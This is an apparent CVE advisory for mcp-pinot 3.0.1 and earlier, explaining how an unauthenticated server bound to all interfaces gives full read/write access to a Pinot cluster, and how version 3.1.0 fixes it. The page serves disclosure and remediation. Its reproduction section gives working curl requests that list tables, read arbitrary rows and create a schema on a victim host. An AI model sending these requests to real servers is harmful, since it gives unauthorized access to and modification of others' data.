mcp-pinot: Unauthenticated tool invocation via default oauth_enabled=False + host 0.0.0.0 bind
Description
mcp-pinot is a Python-based Model Context Protocol (MCP) server for interacting with Apache Pinot. In versions 3.0.1 and below, mcp-pinot defaults to running an HTTP MCP server bound to 0.0.0.0:8080 with no authentication enabled. All MCP tools, including SQL query execution, schema creation, and table-config mutation, are reachable by any network-adjacent caller. The server proxies these calls using server-side Pinot credentials, producing a confused-deputy condition that yields full read/write access to the configured Pinot cluster. This issue has been fixed in version 3.1.0
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1- Range: <=3.0.1
Patches
Vulnerability mechanics
Root cause
"Default configuration binds an unauthenticated HTTP MCP server to 0.0.0.0:8080, allowing any network-adjacent caller to invoke all tools via the server's privileged Pinot credentials (confused-deputy)."
Attack vector
An attacker on the network sends a direct HTTP POST request to the MCP server's default endpoint (`http://victim:8080/mcp`) with a JSON-RPC payload invoking any MCP tool — for example, `list_tables` or `read_query`. Because the server binds to `0.0.0.0:8080` and OAuth is disabled by default, no authentication is required. The server then proxies the request to the upstream Pinot cluster using its own privileged service-account credentials, creating a confused-deputy condition [ref_id=1]. This gives the attacker full read/write access to the Pinot cluster, including SQL query execution, schema creation, and table-config mutation.
Affected code
The vulnerability resides in `mcp_pinot/server.py` and `mcp_pinot/config.py`. The default `ServerConfig` sets `oauth_enabled=False` and binds the HTTP server to `0.0.0.0:8080`, while authentication construction is gated by `oauth_enabled` — when it is `False`, `_auth` stays `None` and all 14 MCP tool endpoints are registered without authentication.
What the fix does
The fix [ref_id=2][ref_id=3] changes the default HTTP bind host to `127.0.0.1` and adds a fail-closed check in `main()`: the server refuses to start if the transport is HTTP, OAuth is disabled, and the host is not a loopback address. Helm defaults are made local-only (no Service), and any non-loopback Kubernetes exposure requires OAuth. Additionally, the `read-query` tool now enforces parser-backed, single-statement read-only SQL validation using `sqlglot`, rejecting stacked statements and write/DDL/admin keywords. These changes eliminate the unauthenticated network exposure and the confused-deputy condition.
Preconditions
- configThe mcp-pinot server must be running with default configuration (oauth_enabled=False, host=0.0.0.0, port=8080).
- networkThe attacker must have network access to the server's HTTP endpoint (any network-adjacent position).
- authNo authentication credentials are required; the server proxies requests using its own privileged Pinot credentials.
- inputThe attacker sends a single HTTP POST request with a JSON-RPC payload invoking any MCP tool.
Reproduction
```bash # 1. Enumerate tables (no Authorization header) curl -X POST http://victim:8080/mcp \ -H 'Content-Type: application/json' \ -d '{ "jsonrpc":"2.0", "method":"tools/call", "params":{"name":"list_tables","arguments":{}}, "id":1 }'
# 2. Read arbitrary table contents (server forwards using its own Pinot credentials) curl -X POST http://victim:8080/mcp \ -H 'Content-Type: application/json' \ -d '{ "jsonrpc":"2.0", "method":"tools/call", "params":{ "name":"read_query", "arguments":{"query":"SELECT * FROM <table> LIMIT 100"} }, "id":2 }'
# 3. Create a new schema (write privileges) curl -X POST http://victim:8080/mcp \ -H 'Content-Type: application/json' \ -d '{ "jsonrpc":"2.0", "method":"tools/call", "params":{ "name":"create_schema", "arguments":{ "schemaJson":"{\"schemaName\":\"attacker_schema\",\"dimensionFieldSpecs\":[{\"name\":\"id\",\"dataType\":\"STRING\"}]}" } }, "id":3 }'```
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/startreedata/mcp-pinot/commit/1c7d3f9cd384854bf72c127d230bdb32299475admitrex_refsource_MISC
- github.com/startreedata/mcp-pinot/issues/90mitrex_refsource_MISC
- github.com/startreedata/mcp-pinot/pull/95mitrex_refsource_MISC
- github.com/startreedata/mcp-pinot/security/advisories/GHSA-73cv-556c-w3g6mitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.